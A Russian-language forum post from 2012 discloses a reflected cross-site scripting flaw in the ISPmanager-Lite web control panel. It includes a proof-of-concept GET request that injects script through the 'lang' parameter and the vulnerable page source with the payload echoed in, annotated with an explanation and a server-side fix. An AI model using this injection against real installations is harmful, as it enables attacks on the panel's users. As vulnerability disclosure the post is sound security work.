ISPmanager-Lite - XSS

Discussion in 'Веб-уязвимости' started by Pirotexnik, 10 Jul 2012.

    [Intro]
    Доброго времени суток.
    Ковырял бложек, наткнулся на сабж. В сабже ХСС.
    [PoC]

    Code:
    GET /manager/ispmgr?lang=";alert("PWNED+BY+p1r0!");// HTTP/1.1
    Cookie: PHPSESSID=nblmvs0lg0bfgvhu0uk4l1r2t5; ads=4815162342; ground=0; best=5; ispmgr4=aqua:ua:0
    Host: site.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    Accept: */*
    Code:
    <script language="JavaScript">
    		// Image path for the "aqua" theme; also used to build the page's <base>.
    		var imgpath = '/manimg/aqua/';
    		// The <base> is derived from the current origin plus the theme image path,
    		// so relative URLs in the page resolve under /manimg/aqua/.
    		var baseHref = location.protocol + "//" + location.host + imgpath;
    		document.write("<base href='" + baseHref + "'>");
    		// Path of the manager binary; setQ() derives the cookie name from it.
    		var binary = "/manager/ispmgr";
    
    		// Preselects the theme and language <option>s of document.authform so
    		// they match the values the server rendered into this inline script.
    		function setThemeLang () {
    			// NOTE(review): "aqua" also appears as the first field of the ispmgr4
    			// cookie in the request above (aqua:ua:0); whether the server takes
    			// the theme from that cookie is not visible here.
    			var theme = "aqua";
    			// NOTE(review): the server echoes the `lang` request parameter into
    			// this string literal without JavaScript-string encoding, so a value
    			// containing a double quote closes the literal and the remainder of
    			// the parameter runs as script -- the request above demonstrates it.
    			// The fix belongs on the server side: emit the value through a
    			// JS/JSON string encoder, or mark the matching <option> as selected
    			// in the HTML instead of echoing the value into inline script. The
    			// [COLOR] tags on the next line are forum display markup, not page
    			// content.
    			var lang = "[COLOR="Red"]";alert("PWNED BY p1r0!");//[/COLOR]";
    
    			// Select the first theme <option> whose value equals `theme`.
    			for ( var i=0; i < document.authform.theme.options.length; i++ )
    				if ( document.authform.theme.options[i].value == theme ) {
    					document.authform.theme.selectedIndex = i;
    					break;
    				}
    
    			// Select the first language <option> whose value equals `lang`;
    			// a value matching no option leaves the current selection unchanged.
    			for ( var i=0; i < document.authform.lang.options.length; i++ )
    				if ( document.authform.lang.options[i].value == lang ) {
    					document.authform.lang.selectedIndex = i;
    					break;
    				}
    		}
    
    		// Persists the currently selected theme and language of document.authform
    		// in a cookie named after the manager binary (e.g. "ispmgr" + "4"), in the
    		// form theme:lang:0 with a fixed far-future expiry. Always returns true so
    		// it can be used as a form submit handler without blocking submission.
    		function setQ() {
    			var form = document.authform;
    			var themeValue = form.theme.options[form.theme.selectedIndex].value;
    			var langValue = form.lang.options[form.lang.selectedIndex].value;
    			// Cookie name = last path segment of `binary` followed by "4".
    			var cookieName = binary.substr(binary.lastIndexOf('/') + 1) + "4";
    			document.cookie = cookieName + "=" + themeValue + ":" + langValue + ":0; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT";
    			return true;
    		}
    	</script>
    Офф сайт разрабов: http://ispsystem.com/ru/
     
    #1 Pirotexnik, 10 Jul 2012
    Last edited: 11 Jul 2012